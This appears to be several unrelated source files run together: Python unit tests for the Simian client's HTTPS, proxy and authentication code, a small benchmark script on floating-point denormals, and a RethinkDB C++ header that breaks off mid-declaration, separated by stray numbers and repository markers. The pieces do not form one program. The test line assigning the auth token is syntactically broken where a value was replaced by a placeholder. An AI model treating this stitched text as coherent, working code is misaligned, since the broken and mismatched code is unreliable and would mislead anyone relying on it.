@mock.patch.object(client.SSL, 'Connection', autospec=True) def testConnect(self, connection_mock, context_mock): """Test connect().""" context = context_mock() conn = connection_mock(context) connection_mock.reset_mock() context_mock.reset_mock() self.mbc._ca_cert_chain = 'cert chain foo' context_mock.return_value = context connection_mock.return_value = conn with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock: self.mbc.connect() self.assertEqual(self.mbc.sock, conn) load_ca_chain_mock.assert_called_once_with(context) context_mock.assert_called_once_with(client._SSL_VERSION) connection_mock.assert_called_once_with(context) conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port)) if client._CIPHER_LIST: context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)]) def testConnectWhenNoCACertChain(self): """Test connect().""" context = mock.create_autospec(M2Crypto.SSL.Context) with mock.patch.object(client.SSL, 'Context', return_value=context): self.assertRaises(client.SimianClientError, self.mbc.connect) if client._CIPHER_LIST: context.assert_has_calls( [mock.call.set_cipher_list(client._CIPHER_LIST)]) class HttpsClientTest(basetest.TestCase): """Test HttpsClient class.""" def setUp(self): super(HttpsClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsClient(self.hostname) def tearDown(self): super(HttpsClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsClient, '_LoadHost') def testInit(self, mock_lh): """Test __init__().""" i = client.HttpsClient(self.hostname) self.assertEqual(i._progress_callback, None) self.assertEqual(i._ca_cert_chain, None) mock_lh.assert_called_once_with(self.hostname, None, None) def testLoadHost(self): """Test _LoadHost().""" self.client._LoadHost('host') self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('host', 12345) self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, 12345) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321') self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321', 9999) self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('foo.bar:5555') self.assertEqual(self.client.hostname, 'foo.bar') self.assertEqual(self.client.port, 5555) self.assertTrue(self.client.use_https) self.client._LoadHost('http://nonsecurehost') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('http://nonsecurehost:1234') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, 1234) self.assertFalse(self.client.use_https) self.client._LoadHost(u'http://unicodehost') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilproxy') self.assertEqual(self.client.proxy_port, 9) self.assertFalse(self.client.proxy_use_https) self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilprxssl') self.assertEqual(self.client.proxy_port, 8) self.assertTrue(self.client.proxy_use_https) def testSetCACertChain(self): """Test SetCACertChain().""" self.client.SetCACertChain('foo') self.assertEqual(self.client._ca_cert_chain, 'foo') def _TestConnect(self, test_client, hostname, port): """Test _Connect().""" m = mock.Mock() m.return_value = m test_client._ca_cert_chain = 'cert chain' use_https = ( (not test_client.proxy_hostname and test_client.use_https) or (test_client.proxy_hostname and test_client.proxy_use_https)) if use_https: self.stubs.Set(client, 'HTTPSMultiBodyConnection', m) else: self.stubs.Set(client, 'HTTPMultiBodyConnection', m) expected = [mock.call(hostname, port)] if use_https: expected.append(mock.call.SetCACertChain('cert chain')) expected.append(mock.call.connect()) test_client._Connect() m.assert_has_calls(expected) def testConnect(self): self._TestConnect(self.client, self.hostname, self.port) def testConnectWithProxy(self): test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123') self._TestConnect(test_client, 'proxyhost', 123) def testGetResponseNoFile(self): """Test _GetResponse() storing body directly into response obj.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'OK' conn = mock.create_autospec(httplib.HTTPConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, body) self.assertEqual(r.body_len, body_len) def testGetResponseOutputFile(self): """Test _GetResponse() sending the body to output_file.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) path = '/file' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(path) fake_open = fake_filesystem.FakeFileOpen(fs) output_file = fake_open(path, 'w') response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'Ok' conn = mock.create_autospec(httplib.HTTPSConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn, output_file=output_file) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, None) self.assertEqual(r.body_len, body_len) output_file.close() self.assertEqual(body, fake_open(path).read()) def testRequest(self): """Test _Request().""" method = 'zGET' url = u'/url' body1 = {'encodeme': 1} body1_encoded = client.urllib.urlencode(body1) body2 = 'leave this alone' headers = {'User-Agent': 'gzip'} conn = mock.create_autospec(httplib.HTTPConnection) self.client._Request(method, conn, url, body1, headers) self.client._Request(method, conn, url, body2, headers) conn.request.assert_has_calls([ mock.call(method, str(url), body=body1_encoded, headers=headers), mock.call(method, str(url), body=body2, headers=headers)]) def _TestDoRequestResponse(self, test_client, url, req_url): """Test _DoRequestResponse().""" method = 'zomg' conn = mock.create_autospec(httplib.HTTPConnection) body = 'body' headers = 'headers' output_file = None response = mock.create_autospec(httplib.HTTPResponse) response.status = 200 proxy_use_https = test_client.proxy_use_https with mock.patch.object(test_client, '_Connect', return_value=conn): request_mock = mock.create_autospec(test_client._Request) self.stubs.Set(test_client, '_Request', request_mock) get_response_mock = mock.Mock(return_value=response) self.stubs.Set(test_client, '_GetResponse', get_response_mock) self.assertEqual( response, test_client._DoRequestResponse( method, url, body, headers, output_file)) request_mock.assert_called_once_with( method, conn, req_url, body=body, headers=headers) get_response_mock.assert_called_once_with(conn, output_file=output_file) conn.assert_not_called() response.assert_not_called() with mock.patch.object( test_client, '_Connect', side_effect=client.httplib.HTTPException): self.assertRaises( client.HTTPError, test_client._DoRequestResponse, method, url, body, headers, output_file) def testDoRequestResponse(self): self._TestDoRequestResponse(self.client, '/url', '/url') def testDoHttpRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='proxyhost:123') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='http://proxyhost:124') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='https://proxyhost:125') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='https://proxyhost:126') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoWithInvalidMethod(self): """Test Do() with invalid method.""" self.assertRaises( NotImplementedError, self.client.Do, 'badmethod', '/url') @mock.patch.object(client.time, 'sleep') def testDo(self, mock_sleep): """Test Do() with correct arguments and no output_filename.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None # HTTP 500 should retry. mock_response_fail = mock.create_autospec(httplib.HTTPResponse) mock_response_fail.status = 500 # HTTP 200 should succeed. mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=[ mock_response_fail, mock_response]) as mock_do_request_response: inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') do_request_response_call = mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file) self.client.Do(method, url, body, headers, output_filename) inorder_calls.assert_has_calls([ mock.call.sleep(0), do_request_response_call, mock.call.sleep(5), do_request_response_call]) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttp500(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.client.Do(method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttpError(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry, but ending with HTTPError.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=client.HTTPError) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.assertRaises( client.HTTPError, self.client.Do, method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) def testDoWithOutputFilename(self): """Test Do() where an output_filename is supplied.""" method = 'GET' url = 'url' body = None headers = {} output_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=output_file) output_filename = '/tmpfile' mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: self.client.Do( method, url, body, headers, output_filename, _open=mock_open) mock_do_request_response.assert_called_once_with( method, url, body=body, headers={}, output_file=output_file) def testDoWithProxy(self): """Test Do() with a proxy specified.""" method = 'GET' url = 'url' proxy = 'proxyhost:123' # Working case. mock_response = mock.create_autospec(httplib.HTTPConnection) mock_response.status = 200 test_client = client.HttpsClient(self.hostname, proxy=proxy) with mock.patch.object( test_client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: test_client.Do(method, url) mock_do_request_response.assert_called_once_with( method, url, body=None, headers={}, output_file=None) # No port case. proxy = 'proxyhost' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) # Bad port case. proxy = 'proxyhost:alpha' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) class HttpsAuthClientTest(basetest.TestCase): """Test HttpsAuthClient.""" def setUp(self): super(HttpsAuthClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsAuthClient(self.hostname) self.fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(self.fs) self.fake_open = fake_filesystem.FakeFileOpen(self.fs) self.stubs.Set(client, 'os', fake_os) def tearDown(self): super(HttpsAuthClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain') def testInit(self, _): """Test __init__().""" c = client.HttpsAuthClient(self.hostname) self.assertEqual(c._auth1, None) self.assertEqual(c._cookie_token, None) def testPlatformSetup(self): """Test PlatformSetup().""" with mock.patch.object(client.platform, 'system', return_value='Darwin'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH) with mock.patch.object(client.platform, 'system', return_value='other'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH) def testGetFacter(self): """Test GetFacter().""" st_dt = client.datetime.datetime.now() facter = {'foo': 'bar', 'one': '1'} file_path = '/x' lines = [ 'foo => bar', 'one => 1', 'I_am_invalid', ] fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines)) fake_file.st_uid = 0 fake_file.st_mtime = int(st_dt.strftime('%s')) self.client.facter_cache_path = file_path with mock.patch.object(client.os, 'geteuid', return_value=0): self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open)) def testGetFacterWhenInsecureFileForRoot(self): """Test GetFacter().""" file_path = '/x' self.client.facter_cache_path = file_path fake_file = self.fs.CreateFile(file_path) fake_file.st_uid = 100 # root with mock.patch.object(client.os, 'geteuid', return_value=0): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() # same regular user with mock.patch.object(client.os, 'geteuid', return_value=200): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() @mock.patch.object(client.os.path, 'isfile', return_value=False) def testGetFacterWhenCacheDoesNotExist(self, _): """Test GetFacter() with a nonexistent cache file.""" self.client.facter_cache_path = '/x' self.assertEqual({}, self.client.GetFacter()) def testGetFacterWhenCachePathIsNone(self): """Test GetFacter() with facter_cache_path is None.""" self.client.facter_cache_path = None self.assertEqual({}, self.client.GetFacter()) def testGetAuthTokenFromHeadersSuccess(self): token = <PASSWORD>;' % auth.AUTH_TOKEN_COOKIE result = self.client._GetAuthTokenFromHeaders( {'set-cookie': 'other=value;,%s,something=else;' % token}) self.assertEqual(token, result) def testGetAuthTokenFromHeadersMissingHeader(self): self.assertRaises( client.SimianClientError, self.client._GetAuthTokenFromHeaders, {'set-cookie': ''}) class SimianClientTest(basetest.TestCase): """Test SimianClient class.""" def setUp(self): self.hostname = 'hostname' self.port = None self.client = client.SimianClient(self.hostname) def testInitWithoutHostname(self): """Test __init__() without a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient() self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME) self.assertEqual(clienttmp._user, user) def testInitWithHostname(self): """Test __init__() with a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient('foo') self.assertEqual(clienttmp.hostname, 'foo') self.assertEqual(clienttmp._user, user) def testInitAsRoot(self): """Test __init__() with a hostname passed.""" with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value='root'): self.assertRaises(client.SimianClientError, client.SimianClient) def testIsDefaultHostClient(self): """Test IsDefaultHostClient().""" self.client._default_hostname = 'foo' self.assertEqual(self.client.IsDefaultHostClient(), 'foo') def testSimianRequest(self): """Test _SimianRequest().""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None good_response = client.Response(status=200, body='hello there') with mock.patch.object( self.client, 'Do', return_value=good_response) as do_mock: self.assertEqual( good_response.body, self.client._SimianRequest(method, url, headers=headers)) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def testSimianRequestWithError(self): """Test _SimianRequest() with an error status returned.""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None error_response = client.Response(status=401, body='fooerror') with mock.patch.object( self.client, 'Do', return_value=error_response) as do_mock: self.assertRaises( client.SimianServerError, self.client._SimianRequest, method, url, headers=headers) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def GenericStubTestAndReturn( self, method, method_return, method_args, stub_method_name, stub_method_return, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_return: any, value to expect from method method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_method_return: any, value to return from stubbed method call stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name """ with mock.patch.object( self.client, stub_method_name, return_value=stub_method_return) as m: got_rv = method(*method_args) self.assertEqual(got_rv, method_return) m.assert_called_once_with(*stub_args, **stub_kwargs) def GenericStubTest( self, method, method_args, stub_method_name, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name Returns: string, 'returnval' """ rv = 'returnval' return self.GenericStubTestAndReturn( method, rv, method_args, stub_method_name, rv, *stub_args, **stub_kwargs) def testGetCatalog(self): """Test GetCatalog().""" name = 'name' self.GenericStubTest( self.client.GetCatalog, [name], '_SimianRequest', 'GET', '/catalog/%s' % name) def testGetManifest(self): """Test GetManifest().""" name = 'name' self.GenericStubTest( self.client.GetManifest, [name], '_SimianRequest', 'GET', '/manifest/%s' % name) def testGetPackage(self): """Test GetPackage().""" name = 'name' self.GenericStubTest( self.client.GetPackage, [name], '_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None) def testGetPackageInfo(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'hello' self.GenericStubTestAndReturn( self.client.GetPackageInfo, 'hello', [filename], '_SimianRequest', response, 'GET', '/pkgsinfo/%s' % filename, full_response=True) def testGetPackageInfoWhenHash(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'body' response.headers = {'x-pkgsinfo-hash': 'hash'} self.GenericStubTestAndReturn( self.client.GetPackageInfo, ('hash', 'body'), [filename, True], '_SimianRequest', response, 'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True) def testDownloadPackage(self): """Test DownloadPackage().""" filename = 'foo' self.GenericStubTest( self.client.DownloadPackage, [filename], '_SimianRequest', 'GET', '/pkgs/%s' % filename, output_filename=filename) def testPostReport(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params], '_SimianRequest', 'POST', url, body) def testPostReportWhenFeedback(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s&_feedback=1' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params, True], '_SimianRequest', 'POST', url, body) def testPostReportBody(self): """Test PostReportBody().""" url = '/reports' body = 'foo' self.GenericStubTest( self.client.PostReportBody, [body], '_SimianRequest', 'POST', url, body) def testPostReportBodyWhenFeedback(self): """Test PostReportBody().""" url = '/reports' body = 'foo' body_with_feedback = 'foo&_feedback=1' self.GenericStubTest( self.client.PostReportBody, [body, True], '_SimianRequest', 'POST', url, body_with_feedback) @mock.patch.object(client.os.path, 'isfile', return_value=True) def testUploadFile(self, _): """Test UploadFile().""" file_type = 'log' file_name = 'file.log' file_path = 'path/to/' + file_name url = '/uploadfile/%s/%s' % (file_type, file_name) mock_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=mock_file) with mock.patch.object(self.client, 'Do') as mock_do: self.client.UploadFile(file_path, file_type, _open=mock_open) mock_do.assert_called_once_with('PUT', url, mock_file) @mock.patch.object(client.logging, 'error', autospec=True) @mock.patch.object(client.os.path, 'isfile', return_value=False) def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error): """Test UploadFile() when the file is not found.""" file_path = 'path/to/file.log' self.client.UploadFile(file_path, 'foo-file-type') mock_logging_error.assert_called_once_with( 'UploadFile file not found: %s', file_path) mock_isfile.assert_called_once_with(file_path) class SimianAuthClientTest(basetest.TestCase): """Test SimianAuthClient class.""" def setUp(self): super(SimianAuthClientTest, self).setUp() self.pac = client.SimianAuthClient() def testGetAuthToken(self): """Test GetAuthToken().""" with mock.patch.object(self.pac, 'DoSimianAuth'): self.pac._cookie_token = 'token' self.assertEqual(self.pac.GetAuthToken(), 'token') def testLogoutAuthToken(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'): self.assertTrue(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) def testLogoutAuthTokenWhenFail(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object( self.pac, '_SimianRequest', side_effect=client.SimianServerError): self.assertFalse(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) logging.basicConfig(filename='/dev/null') def main(unused_argv): basetest.main() if __name__ == '__main__': app.run()
16,683
2,434
<filename>floating-point/denormals.py import os import sys import matplotlib.pyplot as plt import seaborn ROOT = os.path.realpath(os.path.join(os.path.dirname(__file__), "../")) sys.path.append(ROOT) from utils import benchmark data = [ ("Flush", [0, 1]), ("Value", ["0.3", "0.2", "0.1", "0", "1", "10"]) ] frame = benchmark(data, pin_to_cpu=True) ax = seaborn.barplot(data=frame, x="Value", y="Time", hue="Flush") ax.set(ylabel="Time [ms]") plt.show()
201
21,684
<gh_stars>1000+ // Copyright 2010-2014 RethinkDB, all rights reserved. #ifndef CLUSTERING_ADMINISTRATION_ARTIFICIAL_REQL_CLUSTER_INTERFACE_HPP_ #define CLUSTERING_ADMINISTRATION_ARTIFICIAL_REQL_CLUSTER_INTERFACE_HPP_ #include <map> #include <set> #include <string> #include "clustering/administration/cluster_config.hpp" #include "clustering/administration/metadata.hpp" #include "clustering/administration/servers/server_config.hpp" #include "clustering/administration/servers/server_status.hpp" #include "clustering/administration/stats/debug_stats_backend.hpp" #include "clustering/administration/stats/stats_backend.hpp" #include "clustering/administration/tables/db_config.hpp" #include "clustering/administration/tables/debug_table_status.hpp" #include "clustering/administration/tables/table_config.hpp" #include "clustering/administration/tables/table_status.hpp" #include "clustering/administration/issues/issues_backend.hpp" #include "clustering/administration/auth/permissions_artificial_table_backend.hpp" #include "clustering/administration/auth/users_artificial_table_backend.hpp" #include "clustering/administration/logs/logs_backend.hpp" #include "clustering/administration/jobs/backend.hpp" #include "containers/map_sentries.hpp" #include "containers/name_string.hpp" #include "containers/scoped.hpp" #include "containers/uuid.hpp" #include "rdb_protocol/artificial_table/backend.hpp" #include "rdb_protocol/artificial_table/in_memory.hpp" #include "rdb_protocol/context.hpp" class namespace_repo_t; class name_resolver_t; class real_reql_cluster_interface_t; class server_config_client_t; class table_meta_client_t; /* The `artificial_reql_cluster_interface_t` is responsible for handling queries to the `rethinkdb` database. It's implemented as a proxy over the `real_reql_cluster_interface_t`; queries go first to the `artificial_...`, and if they aren't related to the `rethinkdb` database, they get passed on to the `real_...`. */ class artificial_reql_cluster_interface_t : public reql_cluster_interface_t, public home_thread_mixin_t { public: static const uuid_u database_id; static const name_string_t database_name; artificial_reql_cluster_interface_t( std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>> auth_semilattice_view, rdb_context_t *rdb_context); bool db_create( auth::user_context_t const &user_context, const name_string_t &name, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool db_drop( auth::user_context_t const &user_context, const name_string_t &name, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool db_list( signal_t *interruptor, std::set<name_string_t> *names_out, admin_err_t *error_out); bool db_find(const name_string_t &name, signal_t *interruptor, counted_t<const ql::db_t> *db_out, admin_err_t *error_out); bool db_config( auth::user_context_t const &user_context, const counted_t<const ql::db_t> &db, ql::backtrace_id_t bt, ql::env_t *env, scoped_ptr_t<ql::val_t> *selection_out, admin_err_t *error_out); bool table_create( auth::user_context_t const &user_context, const name_string_t &name, counted_t<const ql::db_t> db, const table_generate_config_params_t &config_params, const std::string &primary_key, write_durability_t durability, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool table_drop( auth::user_context_t const &user_context, const name_string_t &name, counted_t<const ql::db_t> db, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool table_list(counted_t<const ql::db_t> db, signal_t *interruptor, std::set<name_string_t> *names_out, admin_err_t *error_out); bool table_find(const name_string_t &name, counted_t<const ql::db_t> db, optional<admin_identifier_format_t> identifier_format, signal_t *interruptor, counted_t<base_table_t> *table_out, admin_err_t *error_out); bool table_estimate_doc_counts( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &name, ql::env_t *env, std::vector<int64_t> *doc_counts_out, admin_err_t *error_out); bool table_config( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &name, ql::backtrace_id_t bt, ql::env_t *env, scoped_ptr_t<ql::val_t> *selection_out, admin_err_t *error_out); bool table_status( counted_t<const ql::db_t> db, const name_string_t &name, ql::backtrace_id_t bt, ql::env_t *env, scoped_ptr_t<ql::val_t> *selection_out, admin_err_t *error_out); bool table_wait( counted_t<const ql::db_t> db, const name_string_t &name, table_readiness_t readiness, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool db_wait( counted_t<const ql::db_t> db, table_readiness_t readiness, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool table_reconfigure( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &name, const table_generate_config_params_t &params, bool dry_run, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool db_reconfigure( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const table_generate_config_params_t &params, bool dry_run, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool table_emergency_repair( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &name, emergency_repair_mode_t, bool dry_run, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool table_rebalance( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &name, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool db_rebalance( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool grant_global( auth::user_context_t const &user_context, auth::username_t username, ql::datum_t permissions, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool grant_database( auth::user_context_t const &user_context, database_id_t const &database_id, auth::username_t username, ql::datum_t permissions, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool grant_table( auth::user_context_t const &user_context, database_id_t const &database_id, namespace_id_t const &table_id, auth::username_t username, ql::datum_t permissions, signal_t *interruptor, ql::datum_t *result_out, admin_err_t *error_out); bool set_write_hook( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &table, const optional<write_hook_config_t> &config, signal_t *interruptor, admin_err_t *error_out); bool get_write_hook( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &table, signal_t *interruptor, ql::datum_t *write_hook_datum_out, admin_err_t *error_out); bool sindex_create( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &table, const std::string &name, const sindex_config_t &config, signal_t *interruptor, admin_err_t *error_out); bool sindex_drop( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &table, const std::string &name, signal_t *interruptor, admin_err_t *error_out); bool sindex_rename( auth::user_context_t const &user_context, counted_t<const ql::db_t> db, const name_string_t &table, const std::string &name, const std::string &new_name, bool overwrite, signal_t *interruptor, admin_err_t *error_out); bool sindex_list( counted_t<const ql::db_t> db, const name_string_t &table, signal_t *interruptor, admin_err_t *error_out, std::map<std::string, std::pair<sindex_config_t, sindex_status_t> > *configs_and_statuses_out); void set_next_reql_cluster_interface(reql_cluster_interface_t *next); artificial_table_backend_t *get_table_backend( name_string_t const &, admin_identifier_format_t) const; using table_backends_map_t = std::map< name_string_t, std::pair<artificial_table_backend_t *, artificial_table_backend_t *>>; table_backends_map_t *get_table_backends_map_mutable(); table_backends_map_t const &get_table_backends_map() const; private: bool next_or_error(admin_err_t *error_out) const; table_backends_map_t m_table_backends; std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>> m_auth_semilattice_view; rdb_context_t *m_rdb_context; reql_cluster_interface_t *m_next; }; class artificial_reql_cluster_backends_t { public: artificial_reql_cluster_backends_t( artificial_reql_cluster_interface_t *artificial_reql_cluster_interface, real_reql_cluster_interface_t *real_reql_cluster_interface, std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>> auth_semilattice_view, std::shared_ptr<semilattice_readwrite_view_t<cluster_semilattice_metadata_t>> cluster_semilattice_view, std::shared_ptr<semilattice_readwrite_view_t<heartbeat_semilattice_metadata_t>> heartbeat_semilattice_view, clone_ptr_t<watchable_t<change_tracking_map_t< 